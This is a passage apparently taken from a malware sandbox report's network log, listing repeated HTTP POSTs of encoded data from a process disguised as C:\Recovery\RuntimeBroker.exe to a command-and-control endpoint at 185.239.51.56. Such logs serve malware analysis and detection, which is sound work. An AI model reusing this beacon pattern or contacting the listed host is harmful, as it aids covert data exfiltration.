                                                                                                  Data Ascii: V^[PZ]^P_ZZSW[VT_Y]GQPW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+Z>["2<2$Z-.%(42<8=6&648'0;<179,-"^%#[..
                                                                                                  Jan 1, 2025 02:28:35.419320107 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:35.425064087 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:35 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  112192.168.2.450114185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:34.816765070 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:35.176074028 CET2504OUTData Raw: 56 5b 5b 50 5f 58 5e 50 5f 5a 5a 53 57 5e 56 56 5f 54 5d 47 51 5c 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[P_X^P_ZZSW^VV_T]GQ\WQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@+)""8% /="=4\?)6% +,';'&--"^%#[.
                                                                                                  Jan 1, 2025 02:28:35.545772076 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:35.557522058 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:35 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  113192.168.2.450120185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:35.677743912 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:36.034621000 CET2500OUTData Raw: 56 5d 5e 5f 5a 5b 5b 50 5f 5a 5a 53 57 59 56 50 5f 58 5d 45 51 55 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^_Z[[P_ZZSWYVP_X]EQUW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(/*^#1,&#[,:?'-(8552#''; _&$!,="^%#[.>
                                                                                                  Jan 1, 2025 02:28:36.379292965 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:36.386363983 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:36 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  114192.168.2.450121185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:36.510262966 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:36.862788916 CET2504OUTData Raw: 53 59 5e 5f 5f 5f 5e 56 5f 5a 5a 53 57 5a 56 51 5f 54 5d 48 51 55 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^___^V_ZZSWZVQ_T]HQUW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@+,2"2(X13,>*\+B:Y<8="C"[#7W0(Z17-"^%#[.*
                                                                                                  Jan 1, 2025 02:28:37.215651989 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:37.224145889 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  115192.168.2.450122185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:37.350708961 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:37.706521034 CET2504OUTData Raw: 56 5c 5e 54 5a 5d 5b 56 5f 5a 5a 53 57 5a 56 57 5f 5a 5d 48 51 56 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^TZ][V_ZZSWZVW_Z]HQVWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['?^!1#&#$;[2<>\*8>".4'[&>X."^%#[.*
                                                                                                  Jan 1, 2025 02:28:38.052087069 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:38.059263945 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  116192.168.2.450123185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:38.192086935 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:38.552119017 CET2504OUTData Raw: 53 5e 5e 57 5a 5c 5b 55 5f 5a 5a 53 57 5a 56 56 5f 5e 5d 49 51 54 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^WZ\[U_ZZSWZVV_^]IQTWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<,582#,1<$*_?;=!57+00^11-"^%#[.*
                                                                                                  Jan 1, 2025 02:28:38.912977934 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:38.921545982 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:38 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  117192.168.2.450124185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:39.052664995 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:39.409873009 CET2504OUTData Raw: 56 58 5e 50 5a 5f 5e 50 5f 5a 5a 53 57 5d 56 54 5f 5a 5d 41 51 57 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX^PZ_^P_ZZSW]VT_Z]AQWWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['D+?*"8[1;,-[?<;%["4^<0(<%4>9"^%#[.6
                                                                                                  Jan 1, 2025 02:28:39.754014015 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:39.761471033 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:39 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  118192.168.2.450125185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:39.894123077 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:40.253391027 CET2504OUTData Raw: 53 5e 5b 52 5f 5f 5e 53 5f 5a 5a 53 57 58 56 54 5f 5e 5d 41 51 54 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[R__^S_ZZSWXVT_^]AQTW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@+,*^!31U78"+:_<>" $3;1429="^%#[."


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  119192.168.2.450126185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:40.446799040 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:40.804219961 CET1600OUTData Raw: 56 59 5e 54 5f 5f 5e 50 5f 5a 5a 53 57 5b 56 57 5f 5c 5d 46 51 56 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^T__^P_ZZSW[VW_\]FQVWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['?*Y#10Z&3Y8.1+$"<%"C6Y#(#W08;17._-"^%#[..
                                                                                                  Jan 1, 2025 02:28:41.149887085 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:41.158845901 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:41 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  120192.168.2.450127185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:40.564219952 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:40.909902096 CET2504OUTData Raw: 56 5f 5e 50 5f 5b 5b 57 5f 5a 5a 53 57 50 56 52 5f 58 5d 44 51 53 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^P_[[W_ZZSWPVR_X]DQSW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(<1!!#&0#/1?42Y(85^5%54^7P';%'29-"^%#[.
                                                                                                  Jan 1, 2025 02:28:41.266350985 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:41.274657011 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:41 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  121192.168.2.450128185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:41.396079063 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2488
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:41.753556013 CET2488OUTData Raw: 56 53 5e 52 5f 5d 5b 52 5f 5a 5a 53 57 59 56 56 5f 5c 5d 47 51 51 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS^R_][R_ZZSWYVV_\]GQQWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A<=!1$&\8Z+*(^*"%57;0'+2&_,-"^%#[.>
                                                                                                  Jan 1, 2025 02:28:42.118315935 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:42.256803036 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:42 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  122192.168.2.450129185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:42.387518883 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:42.737791061 CET2504OUTData Raw: 53 58 5e 56 5a 5d 5b 52 5f 5a 5a 53 57 5c 56 51 5f 55 5d 48 51 56 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SX^VZ][R_ZZSW\VQ_U]HQVW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C??!"(&$;==79?(5!5%74'(([&49.="^%#[.2
                                                                                                  Jan 1, 2025 02:28:43.117933989 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:43.129882097 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  123192.168.2.450130185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:43.260581017 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:43.612817049 CET2504OUTData Raw: 56 5f 5e 5f 5f 58 5e 56 5f 5a 5a 53 57 5c 56 54 5f 5a 5d 42 51 51 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^__X^V_ZZSW\VT_Z]BQQW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+<.Z";2+86\?$(&!>48%;_%:Y9="^%#[.2
                                                                                                  Jan 1, 2025 02:28:43.962426901 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:44.100652933 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:43 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  124192.168.2.450131185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:44.223597050 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:44.582098961 CET2504OUTData Raw: 56 59 5e 56 5f 5d 5e 53 5f 5a 5a 53 57 5a 56 56 5f 5a 5d 47 51 5c 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^V_]^S_ZZSWZVV_Z]GQ\WP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?&_52282+'9<:5"4^,0&*,="^%#[.*
                                                                                                  Jan 1, 2025 02:28:44.943857908 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:44.951380968 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:44 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  125192.168.2.450132185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:45.084901094 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:45.440943003 CET2504OUTData Raw: 53 5e 5b 52 5a 5e 5b 52 5f 5a 5a 53 57 5e 56 53 5f 5a 5d 42 51 5c 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[RZ^[R_ZZSW^VS_Z]BQ\W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B(Z*X"8Y1,*(4](X#62Z"+(0;^1--"^%#[.
                                                                                                  Jan 1, 2025 02:28:45.794415951 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:45.802541971 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:45 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  126192.168.2.450133185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:45.933737040 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
